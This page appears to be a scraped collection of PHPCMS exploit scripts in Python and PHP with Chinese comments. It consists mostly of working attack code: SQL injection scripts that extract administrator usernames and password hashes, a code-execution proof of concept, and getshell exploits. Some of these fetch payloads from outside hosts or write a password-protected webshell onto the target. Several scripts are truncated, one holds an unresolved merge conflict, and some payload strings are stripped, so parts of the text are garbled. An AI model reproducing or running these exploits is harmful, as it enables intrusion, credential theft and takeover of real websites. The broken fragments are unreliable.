# PHPCMS_flash_upload_SQL.py
“`
#encoding=utf-8
#__author__ = ‘greenboy’
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
info = {
‘name’:u’PHPCMS 2008 flash_upload.php SQL注入’,
‘date’:’2014-12-6′,
‘author’:’5up3rc’,
‘poc’:’/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29′
}
headers = {
‘User-Agent’:’Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0′,
‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′
}
audit_request = requests.get(target + info[‘poc’],headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.text.find(’63e1f04640e83605c1d177544a5a0488′) !=-1:
print u'[!]audit success’
print ‘[*]’ + target + info[‘poc’]
else:
print u'[!]audit error’
else:
print ‘connection error’
if __name__ == ‘__main__’:
if len(sys.argv) < 2:
print "Usage: python phpcms_flash_upload_sqli.py [target]\n"
print "Example: python phpcms_flash_upload_sqli.py http://www.xxx.com\n"
sys.exit(1)
else:
target = sys.argv[1].lower()
scan(target)
```
# PHPCMS_Vote_SQL.py
```
#encoding=UTF-8
# __author__ = 'greenboy'
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
info = {
'name':u'phpcms投票模块SQL注入',
'date':'2014-12-4',
'author':'5up3rc',
'poc':'/index.php?m=vote&c=index&a=lists&siteid=1%27%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%33%61%2C%30%78%33%61%2C%6D%64%35%28%33%2E%31%34%31%35%29%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23'
}
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
audit_request = requests.get(target + info['poc'], headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.text.find('63e1f04640e83605c1d177544a5a0488') !=-1:
print u'[!]audit success'
print '[*]' + target + info['poc']
else:
print u'[!]audit error'
else:
print 'connection error'
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: python vote_sqli.py [target]\n"
print "Example: python vote_sqli.py http://www.xxx.com\n"
sys.exit(1)
else:
target = sys.argv[1].lower()
scan(target)
```
# phpcms.php
```
#!/usr/bin/php
“`
# phpcms9.6.0-getshell.py
“`
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me
“””
PHPCMS Unauthenticated Webshell Upload Exploit
Version:
9.x <= 9.6.0 Usage:
1. Upload `payload.txt` on your own public webserver. #payload.txt
#
#
2. Change `PUBLIC_URL` to your own path like `http://your_host/payload.txt`.
3. python POC-T.py -s phpcms9.6.0-getshell -aG “Powered by PHPCMS v9” –limit 100
Reference:
https://www.t00ls.net/viewthread.php?tid=39226&extra=&page=1
“””
import requests
from plugin.util import randomString
PUBLIC_URL = ‘http://7xusrl.com1.z0.glb.clouddn.com/bypassdog.txt’
TIMEOUT = 10
def poc(url):
url = url if ‘://’ in url else ‘http://’ + url
url = url.split(‘#’)[0].split(‘?’)[0].rstrip(‘/’).rstrip(‘/index.php’)
data = {
“siteid”: “1”,
“modelid”: “1”,
“username”: randomString(10),
“password”: randomString(10),
“email”: “{}@qq.com”.format(randomString()),
“info[content]”: “![图片[1]-phpcms 部分exp-棉花糖会员站]({}?.php#.jpg)
“.format(PUBLIC_URL),
“dosubmit”: “1”,
“protocol”: “”,
}
target_url = url + “/index.php?m=member&c=index&a=register&siteid=1”
try:
r = requests.post(target_url, data=data, timeout=TIMEOUT)
if “MySQL Error” in r.content and “http” in r.content:
successUrl = r.text[r.text.index(“http”):r.text.index(“.php”)] + “.php”
return successUrl
except Exception:
return False
<<<<<<< HEAD
return False
=======
return False
>>>>>>> 3fbc07ea35337fa6a00bc02f56dd547906a1263c
“`
# PHPCMS2007_digg_add_SQL.py
“`
#encoding=UTF-8
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
info = {
‘name’:u’PHPCMS 2007 digg_add.php注入’,
‘date’:’2014-11-30′,
‘author’:’0x0F’,
‘poc’:’/digg/digg_add.php?id=1&con=2&digg_mod=digg_data WHERE 1=2 +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(3.1415),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23′
}
headers = {
‘User-Agent’:’Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0′,
‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′
}
audit_request = requests.get(target + info[‘poc’],headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.text.find(’63e1f04640e83605c1d177544a5a0488′) !=-1:
print u'[!]audit success’
print ‘[*]’ + target + info[‘poc’]
else:
print u'[!]audit error’
else:
print ‘connection error’
if __name__ == ‘__main__’:
if len(sys.argv) < 2:
print "Usage: python phpcms_digg_add_php_sqli.py [target]\n"
print "Example: python phpcms_digg_add_php_sqli.py http://www.xxx.com\n"
sys.exit(1)
else:
target = sys.argv[1].lower()
scan(target) ```
# PHPCMS2007SQL.py
```
#encoding=UTF-8
__author__ = 'greenboy'
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
info = {
'name':u'PHPCMS 2007 member.php宽字节注入',
'date':'2014-11-30',
'author':'5up3rc',
'poc': '/member/member.php?username=%d5%27%2B%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C'
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
audit_request = requests.get(target + info['poc'], headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.text.find('63e1f04640e83605c1d177544a5a0488') != -1:
print u'[!]audit success'
print '[*]' + target + info['poc']
else:
print u'[!]audit error'
else:
print 'connection error'
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: python phpcms_member_php_sqli.py [target]\n"
print "Example: python phpcms_member_php_sqli.py http://www.xxx.com\n"
sys.exit(1)
else:
target = sys.argv[1].lower()
scan(target)
```
# phpcms2008_c.php
```
c.php type=2->js.php
Example: php ‘ . $argv[0] . ‘ localhost /phpcms
+——————————————————+
‘);
exit;
}
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
$type = $argv[3];
switch ($type) {
case 1:
$url = ‘/c.php?id=1’;
break;
case 2:
$url = ‘/data/js.php?id=1’;
break;
default:
echo ‘请输入注入页面1或者2’ . “\n”;
exit;
}
//数据库版本
$cmd1 = “‘ and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1”;
$db_ver = get_info($cmd1);
//数据库用户
$cmd2 = “‘ and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1”;
$db_user = get_info($cmd2);
//获取用户表
$cmd3 = “‘ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() and table_name like ‘%_member%’ LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1”;
$member = get_info($cmd3);
//获取管理员数量
$cmd4 = “‘ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,count(*),0x7e) FROM $member where groupid=1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1″;
$ad_count = get_info($cmd4);
//显示注入数据
if (preg_match(‘/MySQL Query/i’, send_pack(‘\”))) {
echo ‘数据库版本: ‘ . $db_ver . “\n”;
echo ‘数据库用户: ‘ . $db_user . “\n”;
echo ‘管理员个数: ‘ . $ad_count . “\n”;
//获取多个管理员
foreach (range(0, ($ad_count – 1)) as $i) {
$cmd5 = “‘ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,username,0x3a,password,0x7e) FROM $member where groupid=1 LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1”;
echo ‘管理员’ . $i . ‘–>’ . get_info($cmd5) . “\n”;
}
} else {
exit(“报告大人,网站不存在此漏洞,请更换注入页面试试!\n”);
}
//发送数据包函数
function send_pack($cmd)
{
global $host, $path, $url;
$data = “GET ” . $path . “$url HTTP/1.1\r\n”;
$data .= “Host: $host\r\n”;
//$data .= “User-Agent: Baiduspider\r\n”;
$data .= “Referer: ” . $cmd . “\r\n”;
$data .= “Connection: Close\r\n\r\n”;
$fp = @fsockopen($host, 80, $errno, $errstr, 10);
//echo ini_get(‘default_socket_timeout’);//默认超时时间为60秒
if (!$fp) {
echo $errno . ‘–>’ . $errstr . “\n”;
exit(‘Could not connect to: ‘ . $host);
} else {
fwrite($fp, $data);
$back = ”;
while (!feof($fp)) {
$back .= fread($fp, 1024);
}
fclose($fp);
}
return $back;
}
//提取返回信息
function get_info($info)
{
preg_match(‘/~(.*)~1/i’, send_pack($info), $admin_match);
if (preg_match(‘/charset=utf-8/i’, send_pack($info))) {
return iconv(‘utf-8’, ‘gbk//IGNORE’, $admin_match[1]);
} else {
return $admin_match[1];
}
}
//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(‘ ‘, microtime());
return $microsec + $sec;
}
echo ‘脚本执行时间:’ . round((func_time() – $start_time), 4) . ‘秒。’;
?>
“`
# PHPCMS2008_EXE.py
“`
# coding=utf-8
”’
phpcms 2008的代码中由于对模板参数处理不当,导致可以任意执行任意代码文件。
”’
import sys
import requests
def scan(target):
info = {
‘name’:u’PHPCMS 2008黄页模块代码执行漏洞’,
‘date’:’2014-11-30′,
‘author’:’5up3rc’,
‘poc’: ‘/yp/product.php?pagesize=%24%7B%40%70%72%69%6E%74%28%6D%64%35%28%33%2E%31%34%31%35%29%29%7D’
}
headers = {
‘User-Agent’: ‘Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0’,
‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’
}
audit_request = requests.get(target + info[‘poc’],headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.text.find(’63e1f04640e83605c1d177544a5a0488′) !=0 or audit_request.text.find(’63e1f04640e83605c1d177544a5a0488′) !=-1:
print u'[!]audit success’
print ‘[*]’ + target + info[‘poc’]
else:
print u'[!]audit error’
else:
print ‘connection error’
if __name__ == ‘__main__’:
if len(sys.argv) < 2:
print "Usage: python phpcms_yp_code_exec.py [target]\n"
print "Example: python phpcms_yp_code_exec.py http://www.xxx.com\n"
sys.exit(1)
else:
target = sys.argv[1].lower()
scan(target)
```
# phpcms2008_preview.php
```
‘ . get_info($ad_pass) . “\n”;
}
} else {
exit(“报告大人,网站不存在此漏洞,你可以继续秒下一个!\n”);
}
//提取返回信息
function get_info($info)
{
preg_match(‘/~(.*?)~1/i’, send_pack($info), $match_string);
if (preg_match(‘/charset=utf-8/i’, send_pack($info))) {
return iconv(‘utf-8’, ‘gbk//IGNORE’, $match_string[1]);
} else {
return $match_string[1];
}
}
//发送数据包函数
function send_pack($cmd)
{
global $host, $path, $cookie;
$data = “GET ” . $path . “/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2″ . urlencode($cmd) . ” HTTP/1.1\r\n”;
$data .= “Host: ” . $host . “\r\n”;
$data .= “User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n”;
$data .= “Cookie:” . $cookie . “\r\n”;
$data .= “Connection: Close\r\n\r\n”;
//echo $data;
//这里一定要2个\r\n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get(‘default_socket_timeout’);//默认超时时间为60秒
if (!$fp) {
echo $errno . ‘–>’ . $errstr;
exit(‘Could not connect to: ‘ . $host);
} else {
fwrite($fp, $data);
$back = ”;
while (!feof($fp)) {
$back .= fread($fp, 1024);
}
fclose($fp);
}
return $back;
}
//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(‘ ‘, microtime());
return $microsec + $sec;
}
echo ‘脚本执行时间:’ . round((func_time() – $start_time), 4) . ‘秒。’;
?>
“`
# PHPCMS2008_SQL.py
“`
”’
common.inc.php文件代码第72行$action、genre变量由GET方式获得,
然后载入escape()方法进行过滤。执行代码第76行,用extract()方法将$_GET得到的数组拆分为变量。
执行job.php文件代码第80行,拼接完成SQL语句,带入数据库进行查询。
如果$genre变量进行二次URL编码即可绕过escape()方法的过滤,导致SQL注入漏洞产生。
”’
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
info = {
‘name’:u’PHPCMS 2008黄页模块SQL注入’,
‘date’:’2014-11-30′,
‘author’:’0x0F’,
‘poc’:’/yp/job.php?action=list&genre=a%2527%2B%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23′
}
headers = {
‘User-Agent’:’Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0′,
‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′
}
audit_request = requests.get(target + info[‘poc’],headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.text.find(’63e1f04640e83605c1d177544a5a0488′) !=0 or audit_request.text.find(’63e1f04640e83605c1d177544a5a0488′) !=-1:
print u'[!]audit success’
print ‘[*]’ + target + info[‘poc’]
else:
print u'[!]audit error’
else:
print ‘connection error’
if __name__ == ‘__main__’:
if len(sys.argv) < 2:
print "Usage: python phpcms_yp_job_php_sqli.py [target]\n"
print "Example: python phpcms_yp_job_php_sqli.py http://www.xxx.com\n"
sys.exit(1)
else:
target = sys.argv[1].lower()
scan(target)
```
# phpcms2008sp3_SQL.php
```
“\n[+] Ex.: php “.$argv[0].” localhost /yp”.
“\n\n”);
}
function query($pos, $chr, $chs)
{
global $prefix;
switch ($chs){
case 1:
$query = “1=1 and if((ascii(substring((select username from “.$prefix.”member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#”;
break;
case 2:
$query = “1=1 and if((ascii(substring((select password from “.$prefix.”member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#”;
break;
case 3:
$query = “1=1 and if((length((select username from “.$prefix.”member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#”;
break;
}
$query = str_replace(” “, “/**/”, $query);
$query = urlencode($query);
return $query;
}
function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
$postdata = “q=&action=searchlist&where=”.query($pos, $chr, $chs);
$message = “POST “.$path.”/product.php HTTP/1.1\r\n”;
$message .= “Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n”;
$message .= “Accept-Language: zh-cn\r\n”;
$message .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$message .= “Accept-Encoding: gzip, deflate\r\n”;
$message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n”;
$message .= “Host: $hostname\r\n”;
$message .= “Content-Length: “.strlen($postdata).”\r\n”;
$message .= “Connection: Close\r\n\r\n”;
$message .= $postdata;
//echo $message;
$time_a = time();
fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);
$time_b = time();
fclose($conn);
//echo $time_b – $time_a.”\r\n”;
if ($time_b – $time_a > 4)
return true;
else
return false;
}
function crkusername($hostname, $path, $chs)
{
global $length;
$key = “abcdefghijklmnopqrstuvwxyz0123456789”;
$chr = 0;
$pos = 1;
echo “[+] username: “;
while ($pos <= $length)
{
if (exploit($hostname, $path, $pos, $key[$chr], $chs))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}
function crkpassword($hostname, $path, $chs)
{
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 32)
{
if (exploit($hostname, $path, $pos, $key[$chr], $chs))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n\n";
}
function lengthcolumns($hostname, $path, $chs)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 0;
$chr = 0;
while ($exit==0)
{
if (exploit($hostname, $path, $pos, $chr, $chs))
{
$exit = 1;
$length = $pos;
}
else
$pos++;
}
echo $length."\n";
return $length;
}
function getprefix($hostname, $path)
{
echo "[+] prefix: ";
$conn = fsockopen($hostname, 80);
$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
$request .= "Host: {$hostname}\r\n";
$request .= "Connection: Close\r\n\r\n";
fputs($conn, $request);
while (!feof($conn))
$reply .= fgets($conn, 1024);
fclose($conn);
preg_match('/FROM `(.+)yp_product/ie',$reply,$match);
if ($match[1])
return $match[1];
else
return false;
}
if ($argc != 3)
usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix)
{
echo $prefix."\r\n";
$length = lengthcolumns($hostname, $path, 3);
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
}
else
{
exit("Exploit failed");
}
?>
“`
# phpcmsV9_uc_SQL.php
“`
126 ))
{$result.=” .”;}
else
{$result.=” “.$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=” “.dechex(ord($string[$i]));}
else
{$exa.=” 0″.dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.=”\r\n”; $exa.=”\r\n”;}
}
return $exa.”\r\n”.$result;
}
$proxy_regex = ‘(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
function send($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy==”) {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ‘No response from ‘.$host.’:’.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ‘Not a valid proxy…’;die;
}
$parts=explode(‘:’,$proxy);
$parts[1]=(int)$parts[1];
echo “Connecting to “.$parts[0].”:”.$parts[1].” proxy…\r\n”;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ‘No response from proxy…’;die;
}
}
fputs($ock,$packet);
if ($proxy==”) {
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=”;
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy=””;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>‘/’) or ($path[strlen($path)-1]<>‘/’)) {echo ‘Error… check the path!’; die;}
if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
function authcode($string, $operation = ‘DECODE’, $key = ”, $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : ”);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == ‘DECODE’ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ”;
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == ‘DECODE’ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d’, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = ”;
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return ”;
}
} else {
return $keyc.str_replace(‘=’, ”, base64_encode($result));
}
}
$SQL = “time=999999999999999999999999&ids=1’&action=deleteuser”;
$SQL = urlencode(authcode($SQL, “ENCODE”, “”));
echo “[1] 访问 http://”.$host.$p.”phpsso_server/api/uc.php?code=”.$SQL.”\n”;
$packet =”GET “.$p.”phpsso_server/api/uc.php?code=”.$SQL.” HTTP/1.0\r\n”;
$packet.=”User-Agent: Mozilla/5.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
send($packet);
if(strpos($html,”MySQL Errno”) > 0){
echo “[2] 发现存在SQL注入漏洞”.”\n”;
echo “[3] 访问 http://”.$host.$p.”phpsso_server/api/logout.php \n”;
$packet =”GET “.$p.”phpsso_server/api/logout.php”.” HTTP/1.0\r\n”;
$packet.=”User-Agent: Mozilla/5.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
send($packet);
preg_match(‘/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/’,$html, $matches);
//print_r($matches);
if(!empty($matches)){
echo “[4] 得到web路径 ” . $matches[0].”\n”;
echo “[5] 尝试写入文件 “. str_replace(“\\”,”/”,$matches[0]) .”caches/shell.php”.”\n”;
$SQL = “time=999999999999999999999999&ids=1)”;
$SQL.=” and 1=2 union select ‘‘ into outfile ‘”. str_replace(“\\”,”/”,$matches[0]) .”caches/shell.php’#”;
$SQL.=”&action=deleteuser”;
$SQL = urlencode(authcode($SQL, “ENCODE”, “”));
echo “[6] 访问 http://”.$host.$p.”phpsso_server/api/uc.php?code=”.$SQL.”\n”;
$packet =”GET “.$p.”phpsso_server/api/uc.php?code=”.$SQL.” HTTP/1.0\r\n”;
$packet.=”User-Agent: Mozilla/5.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
send($packet);
if(strpos($html,”Access denied”) > 0){
echo “[-] MYSQL权限过低 禁止写入文件 :(“;
die;
}
echo “[6] 访问 http://”.$host.$p.”phpsso_server/caches/shell.php”.”\n”;
$packet =”GET “.$p.”phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n”;
$packet.=”User-Agent: Mozilla/5.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
send($packet);
if(strpos($html,”
echo “[7] 测试phpinfo成功!shell密码是a ! enjoy it :)”;
}
}else{
echo “[-]未取到web路径 :(“;
}
}else{
echo “[*]不存在SQL注入漏洞”.”\n”;
}
?>
“`
# PHPCMSV9-GetShell.py
“`
‘;
$file = ‘1.thumb_.Php.JPG%20%20%20%20%20%20%20Php’;
if($ret=Create_dir($url,$path))
{
//echo $ret;
$pattern = “|Server:[^,]+?|U”;
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
if(strpos($matches[0][0],’Apache’) == false)
{
echo “\n亲!此网站不是apache的网站。\n”;exit;
}
}
$ret = GetShell($url,$phpshell,$path,$file);
$pattern = “|http:\/\/[^,]+?\.,?|U”;
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo “\n”.’密码为: ‘.$pass.”\n”;
echo “\r\nurl地址: “.$matches[0][0].’JPG%20%20%20%20%20%20%20Php’.”\n”;exit;
}
else
{
$pattern = “|\/uploadfile\/[^,]+?\.,?|U”;
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo “\n”.’密码为: ‘.$pass.”\n”;
echo “\r\nurl地址:”.’http://’.$url.$path.$matches[0][0].’JPG%20%20%20%20%20%20%20Php’.”\n”;exit;
}
else
{
echo “\r\n没得到!\n”;exit;
}
}
}
function GetShell($url,$shell,$path,$js)
{
$content =$shell;
$data = “POST “.$path.”/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://”.$url.$path.”/uploadfile/”.$js.” HTTP/1.1\r\n”;
$data .= “Host: “.$url.”\r\n”;
$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n”;
$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”;
$data .= “Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n”;
$data .= “Connection: close\r\n”;
$data .= “Content-Length: “.strlen($content).”\r\n\r\n”;
$data .= $content.”\r\n”;
$ock=fsockopen($url,80);
if (!$ock)
{
echo “\n”.”此网站没有回应,检测url是否输入正确”.”\n”;exit;
}
else
{
fwrite($ock,$data);
$resp = ”;
while (!feof($ock))
{
$resp.=fread($ock, 1024);
}
return $resp;
}
}
function Create_dir($url,$path=”)
{
$content =’I love you’;
$data = “POST “.$path.”/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n”;
$data .= “Host: “.$url.”\r\n”;
$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n”;
$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”;
$data .= “Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n”;
$data .= “Connection: close\r\n”;
$data .= “Content-Length: “.strlen($content).”\r\n\r\n”;
$data .= $content.”\r\n”;
$ock=fsockopen($url,80);
if (!$ock)
{
echo “\n”.”此网站没有回应,检测url是否输入正确”.”\n”;exit;
}
fwrite($ock,$data);
$resp = ”;
while (!feof($ock))
{
$resp.=fread($ock, 1024);
}
return $resp;
}
?>
“`
请登录后查看评论内容